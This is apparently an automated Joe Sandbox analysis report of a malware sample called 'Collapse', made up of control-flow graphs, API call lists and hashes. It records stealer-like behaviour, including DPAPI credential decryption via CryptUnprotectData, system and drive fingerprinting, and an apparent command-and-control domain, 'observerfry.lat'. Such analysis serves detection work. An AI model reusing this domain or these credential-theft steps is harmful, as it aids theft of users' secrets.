13884->13884 13885 4410f0 LdrInitializeThunk 13884->13885 13885->13884 13886->13868 13887->13868 13890 441110 13888->13890 13889 44128e 13889->13874 13890->13889 13903 43e0f0 LdrInitializeThunk 13890->13903 13893 441620 13892->13893 13893->13893 13896 4416bf 13893->13896 13904 43e0f0 LdrInitializeThunk 13893->13904 13895 4417ae 13895->13884 13896->13895 13905 43e0f0 LdrInitializeThunk 13896->13905 13899 441510 13898->13899 13899->13899 13900 4415ae 13899->13900 13906 43e0f0 LdrInitializeThunk 13899->13906 13900->13875 13902->13876 13903->13889 13904->13896 13905->13895 13906->13900 13907 43e86a 13908 43e880 13907->13908 13908->13908 13911 43e0f0 LdrInitializeThunk 13908->13911 13910 43e9cf 13911->13910 13912 42c4f6 13913 42c500 13912->13913 13914 42c5b9 GetPhysicallyInstalledSystemMemory 13913->13914 13915 42c5e0 13914->13915 13915->13915 13916 43e3f6 13917 43e430 13916->13917 13919 43e59e 13917->13919 13920 43e0f0 LdrInitializeThunk 13917->13920 13920->13919 13921 42c97f 13923 42c9b0 13921->13923 13922 42caae 13923->13922 13925 43e0f0 LdrInitializeThunk 13923->13925 13925->13922 13926 40c9fd CoInitializeSecurity
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !$0\$1]$2]$=]$B]$D$D$GI$GI$H]$I7$N]$O]$Ok$R$Wo$[r$`$tL$<$]$]$]$]
                                                                                                        • API String ID: 0-3810882205
                                                                                                        • Opcode ID: 8bcf170c79f42b2c4dd93db230ae5a1c0c32752b56985c1029db55e4b2e3d0e5
                                                                                                        • Instruction ID: 26e37b5a27921351f131a8d65d8dd6bf57fb013c5090a7881b03709181e5621c
                                                                                                        • Opcode Fuzzy Hash: 8bcf170c79f42b2c4dd93db230ae5a1c0c32752b56985c1029db55e4b2e3d0e5
                                                                                                        • Instruction Fuzzy Hash: A703AD7161C3508BD328DF28C5853AFB7E1AFC5310F158A2EE9D997391E77889818B4B

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 430 438c90-438cbb 431 438cc0-438d08 430->431 431->431 432 438d0a-438d18 431->432 433 438d20-438d54 432->433 433->433 434 438d56-438d9f 433->434 435 438da0-438dd5 434->435 435->435 436 438dd7-438df0 435->436 438 438df2 436->438 439 438dfa-438e48 CoCreateInstance 436->439 438->439 440 439244-439269 call 43f940 GetVolumeInformationW 439->440 441 438e4e-438e7f 439->441 446 439273-439275 440->446 447 43926b-43926f 440->447 442 438e80-438edb 441->442 442->442 444 438edd-438f08 SysAllocString 442->444 450 43922f-439240 SysFreeString 444->450 451 438f0e-438f28 CoSetProxyBlanket 444->451 449 439299-4392a0 446->449 447->446 452 4392a2-4392a9 449->452 453 4392ac-4392da 449->453 450->440 455 439225-43922b 451->455 456 438f2e-438f43 451->456 452->453 454 4392e0-4392fa 453->454 454->454 457 4392fc-43932a call 41d520 454->457 455->450 458 438f50-438f7a 456->458 464 439330-43933b 457->464 458->458 461 438f7c-438ff2 SysAllocString 458->461 463 439000-439043 461->463 463->463 465 439045-439071 SysAllocString 463->465 464->464 466 43933d-439349 464->466 471 439213-439223 SysFreeString * 2 465->471 472 439077-439099 465->472 467 439280-439293 466->467 468 43934f-43935f call 407fb0 466->468 467->449 473 439364-43936b 467->473 468->467 471->455 476 439209-43920f 472->476 477 43909f-4390a2 472->477 476->471 477->476 478 4390a8-4390ad 477->478 478->476 479 4390b3-4390fb VariantInit 478->479 480 439100-43911a 479->480 480->480 481 43911c-439126 480->481 482 43912a-43912c 481->482 483 439132-439138 482->483 484 4391f8-439205 VariantClear 482->484 483->484 485 43913e-43914c 483->485 484->476 486 43914e-439153 485->486 487 43918d 485->487 489 43916c-439170 486->489 488 43918f-4391b7 call 407f30 call 408cf0 487->488 500 4391b9 488->500 501 4391be-4391ce 488->501 491 439172-43917b 489->491 492 439160 489->492 495 439182-439186 491->495 496 43917d-439180 491->496 494 439161-43916a 492->494 494->488 494->489 495->494 498 439188-43918b 495->498 496->494 498->494 500->501 502 4391d0 501->502 503 4391d5-4391f4 call 407f60 call 407f40 501->503 502->503 503->484
                                                                                                        APIs
                                                                                                        • CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C,00000000), ref: 00438E40
                                                                                                        • SysAllocString.OLEAUT32(61B56187), ref: 00438EE2
                                                                                                        • CoSetProxyBlanket.COMBASE(1DC04096,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438F20
                                                                                                        • SysAllocString.OLEAUT32(61B56187), ref: 00438F7D
                                                                                                        • SysAllocString.OLEAUT32(3E123E2D), ref: 0043904A
                                                                                                        • VariantInit.OLEAUT32(5B745B4F), ref: 004390B8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                        • String ID: 2>6>$3>$>$7>c>$C$O[t[$\$d>o>$f>>$v>
                                                                                                        • API String ID: 65563702-2290779530
                                                                                                        • Opcode ID: 38e3d282e63bcbfb1644009ead8865c251bf27a565a09847d5bf744115630eea
                                                                                                        • Instruction ID: c0e79de85990c71ab815b91cf48e4bfa203ec5810b040c1c91de88aa8a84c684
                                                                                                        • Opcode Fuzzy Hash: 38e3d282e63bcbfb1644009ead8865c251bf27a565a09847d5bf744115630eea
                                                                                                        • Instruction Fuzzy Hash: 8C02DF72A08301ABD710DF64CC85B6BB7A6EFC9714F14892DF581AB390D779D805CB8A

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 518 422870-4228bf 519 4228c0-42293c 518->519 519->519 520 42293e-42297f RtlExpandEnvironmentStrings 519->520 521 422980-4229a5 520->521 521->521 522 4229a7-4229b1 521->522 523 422a00-422a0c 522->523 524 422b20-422b29 522->524 525 422b10-422b17 522->525 526 4229f7-4229fd call 407f40 522->526 527 422cd5-422d7f 522->527 528 422cba 522->528 529 4229b8-4229be 522->529 530 422ca8-422cb2 522->530 531 4229ef 522->531 532 422a0d-422a16 522->532 535 422b32 524->535 536 422b2b-422b30 524->536 525->524 526->523 539 422d80-422d98 527->539 537 4229c0-4229c5 529->537 538 4229c7 529->538 530->528 531->526 533 422a18-422a1d 532->533 534 422a1f 532->534 541 422a26-422a5a call 407f30 533->541 534->541 542 422b39-422bdf call 407f30 535->542 536->542 543 4229ca-4229e8 call 407f30 RtlExpandEnvironmentStrings 537->543 538->543 539->539 544 422d9a-422daa call 420820 539->544 554 422a60-422a9b 541->554 555 422be0-422c25 542->555 543->523 543->524 543->525 543->526 543->527 543->528 543->530 543->531 543->532 556 422cc0-422cc6 call 407f40 543->556 557 422dba-422ddb 543->557 553 422daf-422db2 544->553 553->557 554->554 560 422a9d-422aa5 554->560 555->555 561 422c27-422c33 555->561 577 422ccf 556->577 558 422de0-422e11 557->558 558->558 562 422e13-422e9b 558->562 564 422ac1-422acd 560->564 565 422aa7-422aaf 560->565 566 422c51-422c5d 561->566 567 422c35-422c3f 561->567 568 422ea0-422edf 562->568 570 422af1-422afc call 4412e0 564->570 571 422acf-422ad3 564->571 569 422ab0-422abf 565->569 573 422c81-422ca1 GetLogicalDrives call 4412e0 566->573 574 422c5f-422c63 566->574 572 422c40-422c4f 567->572 568->568 576 422ee1-422f0a call 4202f0 568->576 569->564 569->569 583 422b01-422b09 570->583 578 422ae0-422aef 571->578 572->566 572->572 573->523 573->526 573->528 573->530 573->556 573->557 573->577 584 422f14 573->584 585 422f1a-422f20 call 407f40 573->585 580 422c70-422c7f 574->580 576->584 577->527 578->570 578->578 580->573 580->580 583->524 583->525 583->527 583->528 583->530 583->556 583->557 584->585
                                                                                                        APIs
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00422970
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004229DD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                        • String ID: *,=,$,,=,$diJ$LQL
                                                                                                        • API String ID: 237503144-2531928868
                                                                                                        • Opcode ID: 841c2c15685187bd954a2d995779f68ece85c9bd557ea18b83c4609880cd3a89
                                                                                                        • Instruction ID: e81b2ff4bd20acc539124ec0c676da8b120a63586ebe534c2a7055d2906807d5
                                                                                                        • Opcode Fuzzy Hash: 841c2c15685187bd954a2d995779f68ece85c9bd557ea18b83c4609880cd3a89
                                                                                                        • Instruction Fuzzy Hash: 8CF121B66183148FC314DF54E98162BB7E1FFC6344F04896DE5C59B360E7B89A09CB8A

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 589 4104e7-410599 call 413d90 * 3 call 401870 * 2 600 41059b-4105d3 call 413950 589->600 601 41059d 589->601 609 4105d5 600->609 610 4105d7-410652 call 407f30 call 40a5e0 call 401870 600->610 603 410e54 601->603 604 4118a7 603->604 606 4118a9-4118ba call 401f30 604->606 616 40eeb2-40ef4a call 401f40 call 401e30 606->616 617 40eeab-4118cb 606->617 609->610 625 410654 610->625 626 410656-41069e call 413950 610->626 630 40ef4c-40efce call 413d90 call 401970 616->630 631 40ef4e 616->631 628 4106d2-41071c call 413950 625->628 641 4106a0 626->641 642 4106a2-4106cd call 407f30 call 40a5e0 626->642 639 410720-4107ad call 407f30 call 40a5e0 RtlExpandEnvironmentStrings 628->639 640 41071e 628->640 630->604 649 40efd4 630->649 631->606 653 4107af-4107b2 639->653 640->639 641->642 642->628 649->604 654 4107b4-4107d7 653->654 655 4107d9-4107e5 653->655 654->653 656 4107e7-410815 655->656 657 4107e9-4107f7 call 407f40 655->657 660 410817 656->660 661 410819-41085f call 407f30 656->661 666 410e52 657->666 660->661 668 410861-41087b call 407f40 * 2 661->668 669 410880-41090b call 407f40 call 401870 661->669 666->603 688 410e50 668->688 680 41090d-410930 call 413950 669->680 681 41095c-4109c3 call 401b80 669->681 693 410932 680->693 694 410934-41095a call 407f30 call 40a5e0 680->694 689 4109ca-4109cd 681->689 688->666 691 410a00-410a20 call 401a80 689->691 692 4109cf-4109fe 689->692 699 410d43-410daf call 408b60 call 4146d0 691->699 700 410a26-410a55 call 401f30 691->700 692->689 693->694 694->681 709 410db4-410dc3 call 4095a0 699->709 710 410a57 700->710 711 410a59-410a77 call 407f30 700->711 716 410dc5-410dd4 709->716 717 410df9-410e20 call 407f40 * 2 709->717 710->711 718 410aa0-410aa2 711->718 719 410a79-410a87 711->719 722 410dd6 716->722 723 410de8-410df7 call 407f40 716->723 750 410e22-410e25 call 407f40 717->750 751 410e2a-410e34 717->751 721 410aa4-410ab0 718->721 725 410a89-410a95 call 413a80 719->725 727 410ac0-410afe call 401f40 721->727 728 410ab2-410abb 721->728 729 410dd8-410de4 call 413c10 722->729 723->717 741 410a97-410a9e 725->741 743 410b00-410b03 727->743 728->699 744 410de6 729->744 741->718 746 410b05-410b37 743->746 747 410b39-410b77 call 401870 743->747 744->723 746->743 753 410b7e-410b81 747->753 750->751 755 410e44-410e4b call 408c40 751->755 756 410e36-410e3f call 407f40 751->756 758 410b83-410bd2 753->758 759 410bd4-410c12 call 401870 753->759 755->688 756->755 758->753 764 410c19-410c1c 759->764 765 410c56-410c95 call 401b80 764->765 766 410c1e-410c54 764->766 769 410c97-410c9a 765->769 766->764 770 410cd4-410d3e call 401b80 call 413aa0 769->770 771 410c9c-410cd2 769->771 770->721 771->769
                                                                                                        APIs
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL ref: 00410782
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                        • String ID: 6L$7$di$rj$
                                                                                                        • API String ID: 237503144-3659263430
                                                                                                        • Opcode ID: 5a11074f47a8175fa62817934415b2d3420978d561d6e4037c068776ddd5e059
                                                                                                        • Instruction ID: 93c5423282e88211a1001a396d865792dd41de102bbe3f695b7f2f8a3b7159a9
                                                                                                        • Opcode Fuzzy Hash: 5a11074f47a8175fa62817934415b2d3420978d561d6e4037c068776ddd5e059
                                                                                                        • Instruction Fuzzy Hash: 48328C75A0D3408BC364AF79C5813EFBBE0AF84354F14892FE5D997391DA7889818B4B

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 901 4085d0-4085e1 call 43d580 904 4085e7-4085ee call 4361e0 901->904 905 408998-40899a ExitProcess 901->905 908 408981-408988 904->908 909 4085f4-40862b GetCurrentProcessId GetCurrentThreadId 904->909 910 408993 call 43e040 908->910 911 40898a-408990 call 407f40 908->911 912 408633-4087bb SHGetSpecialFolderPathW 909->912 913 40862d-408631 909->913 910->905 911->910 916 4087c0-40880e 912->916 913->912 916->916 918 408810-40883f call 43c1c0 916->918 921 408840-40885c 918->921 922 408876-40888f GetForegroundWindow 921->922 923 40885e-408874 921->923 924 408930-408975 call 409ae0 922->924 925 408895-4088b0 922->925 923->921 924->908 930 408977 call 40c820 924->930 926 4088b2-4088b4 925->926 927 4088b6-40892e 925->927 926->927 927->924 932 40897c call 40b3b0 930->932 932->908
                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004085F4
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004085FE
                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040875A
                                                                                                        • GetForegroundWindow.USER32 ref: 00408887
                                                                                                          • Part of subcall function 0040B3B0: FreeLibrary.KERNEL32(00408981), ref: 0040B3B6
                                                                                                          • Part of subcall function 0040B3B0: FreeLibrary.KERNEL32 ref: 0040B3D7
                                                                                                        • ExitProcess.KERNEL32 ref: 0040899A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3676751680-0
                                                                                                        • Opcode ID: 3501a65e4930fe3fa56a037192b4047e99a07fb4919e639947ba2e74cc683e01
                                                                                                        • Instruction ID: ad6200de4210d9a04599fce77ba0fdf2601055967606580d5498285a901ef58c
                                                                                                        • Opcode Fuzzy Hash: 3501a65e4930fe3fa56a037192b4047e99a07fb4919e639947ba2e74cc683e01
                                                                                                        • Instruction Fuzzy Hash: B7A10776B443044BC308EF69DD9136AF6D6ABC8310F0DD43EA885DB395EEBC9D058685

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 943 40d643-40d662 call 4095a0 CoUninitialize 946 40d670-40d6d8 943->946 946->946 947 40d6da-40d6f2 946->947 948 40d700-40d735 947->948 948->948 949 40d737-40d779 948->949 950 40d780-40d7f5 949->950 950->950 951 40d7f7-40d801 950->951 952 40d803-40d80b 951->952 953 40d81b-40d826 951->953 954 40d810-40d819 952->954 955 40d828-40d82f 953->955 956 40d83d 953->956 954->953 954->954 957 40d830-40d839 955->957 958 40d840-40d848 956->958 957->957 959 40d83b 957->959 960 40d84a-40d84d 958->960 961 40d85d 958->961 959->958 962 40d850-40d859 960->962 963 40d860-40d86b 961->963 962->962 964 40d85b 962->964 965 40d87b-40d885 963->965 966 40d86d-40d86f 963->966 964->963 967 40d887-40d88a 965->967 968 40d89b-40d8a9 965->968 969 40d870-40d879 966->969 970 40d890-40d899 967->970 971 40d8c1-40d982 968->971 972 40d8ab-40d8af 968->972 969->965 969->969 970->968 970->970 974 40d990-40d9ea 971->974 973 40d8b0-40d8bd 972->973 973->973 975 40d8bf 973->975 974->974 976 40d9ec-40da06 974->976 975->971 977 40da10-40da76 976->977 977->977 978 40da78-40dae3 call 40b3e0 call 4095a0 CoUninitialize 977->978 983 40daf0-40db5b 978->983 983->983 984 40db5d-40db72 983->984 985 40db80-40dbb8 984->985 985->985 986 40dbba-40dbff 985->986 987 40dc00-40dc75 986->987 987->987 988 40dc77-40dc84 987->988 989 40dc86-40dc88 988->989 990 40dc9b-40dca6 988->990 991 40dc90-40dc99 989->991 992 40dcc0 990->992 993 40dca8-40dcaf 990->993 991->990 991->991 995 40dcc3-40dccb 992->995 994 40dcb0-40dcb9 993->994 994->994 996 40dcbb 994->996 997 40dcf0 995->997 998 40dccd-40dcd3 995->998 996->995 999 40dcf3-40dcfe 997->999 1000 40dce0-40dce9 998->1000 1001 40dd00-40dd01 999->1001 1002 40dd1b-40dd23 999->1002 1000->1000 1003 40dceb 1000->1003 1004 40dd10-40dd19 1001->1004 1005 40dd25-40dd28 1002->1005 1006 40dd3b-40dd47 1002->1006 1003->999 1004->1002 1004->1004 1007 40dd30-40dd39 1005->1007 1008 40dd61-40de2f 1006->1008 1009 40dd49-40dd4b 1006->1009 1007->1006 1007->1007 1011 40de30-40de8a 1008->1011 1010 40dd50-40dd5d 1009->1010 1010->1010 1012 40dd5f 1010->1012 1011->1011 1013 40de8c-40deaf 1011->1013 1012->1008 1014 40deb0-40df0e 1013->1014 1014->1014 1015 40df10-40df2d call 40b3e0 1014->1015 1017 40df32-40df49 1015->1017
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Uninitialize
                                                                                                        • String ID: observerfry.lat
                                                                                                        • API String ID: 3861434553-3462519685
                                                                                                        • Opcode ID: 5c3e07459faded43a0ba1ce952c9247a7474cd129e8cbe0b407761016ea04f75
                                                                                                        • Instruction ID: 5cdfe13503f33a145c73b8f78b442bb27e6af6bd9d2eacdeba7417bbc26f7e4a
                                                                                                        • Opcode Fuzzy Hash: 5c3e07459faded43a0ba1ce952c9247a7474cd129e8cbe0b407761016ea04f75
                                                                                                        • Instruction Fuzzy Hash: A34225756057418FD328CF39C990622BBE3FF9630071996ADD4868F7A6DB39E806CB44

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1018 42c4f6-42c521 call 433330 call 407f40 1023 42c530-42c556 1018->1023 1023->1023 1024 42c558-42c55d 1023->1024 1025 42c56b-42c577 1024->1025 1026 42c55f 1024->1026 1028 42c591-42c5d8 call 43f940 GetPhysicallyInstalledSystemMemory 1025->1028 1029 42c579-42c57b 1025->1029 1027 42c560-42c569 1026->1027 1027->1025 1027->1027 1034 42c5e0-42c6a0 1028->1034 1030 42c580-42c58d 1029->1030 1030->1030 1033 42c58f 1030->1033 1033->1028 1034->1034 1035 42c6a6-42c6df call 41d520 1034->1035 1038 42c6e0-42c71f 1035->1038 1038->1038 1039 42c721-42c726 1038->1039 1040 42c728-42c72b 1039->1040 1041 42c73d 1039->1041 1042 42c730-42c739 1040->1042 1043 42c73f-42c74a 1041->1043 1042->1042 1044 42c73b 1042->1044 1045 42c75b-42c766 1043->1045 1046 42c74c-42c74f 1043->1046 1044->1043 1048 42c77b-42c7c9 1045->1048 1049 42c768-42c769 1045->1049 1047 42c750-42c759 1046->1047 1047->1045 1047->1047 1051 42c7d0-42c83b 1048->1051 1050 42c770-42c779 1049->1050 1050->1048 1050->1050 1051->1051 1052 42c83d-42c842 1051->1052 1053 42c844-42c84a 1052->1053 1054 42c85d-42c860 1052->1054 1055 42c850-42c859 1053->1055 1056 42c862-42c86a 1054->1056 1055->1055 1057 42c85b 1055->1057 1058 42c87b-42c8f7 1056->1058 1059 42c86c-42c86f 1056->1059 1057->1056 1060 42c870-42c879 1059->1060 1060->1058 1060->1060
                                                                                                        APIs
                                                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C5BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                                                        • String ID: UzUy
                                                                                                        • API String ID: 3960555810-1793371523
                                                                                                        • Opcode ID: 330b5ba03eeb65544f05e8023bc46f0aadf77a918e824a83d5395c3f738fefd6
                                                                                                        • Instruction ID: a9889ccade49914761779446ee1e12bcc6830a2b46294e2a06ffadc3a624b005
                                                                                                        • Opcode Fuzzy Hash: 330b5ba03eeb65544f05e8023bc46f0aadf77a918e824a83d5395c3f738fefd6
                                                                                                        • Instruction Fuzzy Hash: 36C1D3B56047428FD729CF29C490766BBE2BF9A300F18C56EC4DAC77A1DB39A446CB44

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1061 4164fd-4164ff 1062 418a6f-418a75 1061->1062 1063 418dfb-418dfd 1062->1063 1064 418a7b-418a8c 1062->1064 1063->1062 1065 418a93 1064->1065 1066 418a8e-418a91 1064->1066 1067 418a94-418aa0 1065->1067 1066->1065 1066->1067 1068 418aa2-418aa5 1067->1068 1069 418aa7 1067->1069 1068->1069 1070 418aa8-418ac2 call 407f30 1068->1070 1069->1070 1073 418ac8-418acf 1070->1073 1074 418bcd-418c04 call 43f940 1070->1074 1076 418af0-418b3d call 41cc50 * 2 1073->1076 1077 418c09-418c2d CryptUnprotectData 1074->1077 1082 418ae0-418aea 1076->1082 1083 418b3f-418b5a call 41cc50 1076->1083 1077->1063 1082->1074 1082->1076 1083->1082 1086 418b5c-418b85 1083->1086 1087 418ad5-418ad9 1086->1087 1088 418b8b-418ba1 call 41cc50 1086->1088 1087->1082 1091 418ad1 1088->1091 1092 418ba7-418bc8 1088->1092 1091->1087 1092->1082
                                                                                                        APIs
                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00418C23
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CryptDataUnprotect
                                                                                                        • String ID: OzA
                                                                                                        • API String ID: 834300711-1351414677
                                                                                                        • Opcode ID: 980f7e20317f797d1d84ed87af443f0ef7f9ef54927ba0c62178187bca58ab68
                                                                                                        • Instruction ID: 9c97545d1ec6c4f6ccf0580d26e68663f345747e0ab963785eb3c0ade874f854
                                                                                                        • Opcode Fuzzy Hash: 980f7e20317f797d1d84ed87af443f0ef7f9ef54927ba0c62178187bca58ab68
                                                                                                        • Instruction Fuzzy Hash: FB51A0B150C3429FC724CF18C4916ABB7E1AF94344F19492EE4DA87342DB38ED49CB96

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1093 42dcfd-42dd1f 1094 42dd20-42dd68 1093->1094 1094->1094 1095 42dd6a-42dd75 1094->1095 1096 42dd77-42dd78 1095->1096 1097 42dd8b-42ddbb GetComputerNameExA 1095->1097 1098 42dd80-42dd89 1096->1098 1098->1097 1098->1098
                                                                                                        APIs
                                                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042DD9E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ComputerName
                                                                                                        • String ID: BO
                                                                                                        • API String ID: 3545744682-2594093272
                                                                                                        • Opcode ID: b08c22ce4b7c3fcd8b8aadc2e3f094a6628319684588e68ebdd772a665029c7b
                                                                                                        • Instruction ID: 5ad6301c80e653c644220d7d2e292410a4effc3e0121b6233004abf2f008a940
                                                                                                        • Opcode Fuzzy Hash: b08c22ce4b7c3fcd8b8aadc2e3f094a6628319684588e68ebdd772a665029c7b
                                                                                                        • Instruction Fuzzy Hash: BF11C1716116028BD708CF34D861776B7E1EF92310F2994ACD48BCB766EA38A851CB18
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: D]+\$D]+\
                                                                                                        • API String ID: 0-1297882787
                                                                                                        • Opcode ID: 0cec99a0f7962a11b2553aabe7c257a624aada78e5c5555c9192cf4879ffc788
                                                                                                        • Instruction ID: 69279f5087e4f62d0d426cd9275475f8cf196777a585662fe09cdae49935fb4d
                                                                                                        • Opcode Fuzzy Hash: 0cec99a0f7962a11b2553aabe7c257a624aada78e5c5555c9192cf4879ffc788
                                                                                                        • Instruction Fuzzy Hash: A2216A38505111DBCB1CAB06DC5073FB36AEB09714F25693ED893973D1D768AC10878D
                                                                                                        APIs
                                                                                                        • LdrInitializeThunk.NTDLL(004412BD,?,00000018,?,?,00000018,?,?,?), ref: 0043E11E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: AbGb
                                                                                                        • API String ID: 0-1429939900
                                                                                                        • Opcode ID: eb83c321434e39099f31fb5903d0729f5f0246303bc02a6d3ad1a735d05c9189
                                                                                                        • Instruction ID: 2a1a4ac01f946402103d47271ce3cad55cc9447f86df647dd0cf4f9e0c2e7ece
                                                                                                        • Opcode Fuzzy Hash: eb83c321434e39099f31fb5903d0729f5f0246303bc02a6d3ad1a735d05c9189
                                                                                                        • Instruction Fuzzy Hash: 4C317C76B516158BDB08CFA8CDD1BEEB7B2EF88300F199079DA01E7394D67898058B58
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: da46085564fd87b54e877af663b6603514f0e6bd29712242b6c0843e244e706b
                                                                                                        • Instruction ID: 146906b21e84a71a5447d267da4ba6aaf717e0b7f914c08b2fcba104c0b58f90
                                                                                                        • Opcode Fuzzy Hash: da46085564fd87b54e877af663b6603514f0e6bd29712242b6c0843e244e706b
                                                                                                        • Instruction Fuzzy Hash: 61517D72E042205BD7249F18CC9077BB391EFD9704F16952EDD85B7390E6399C118BCA

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
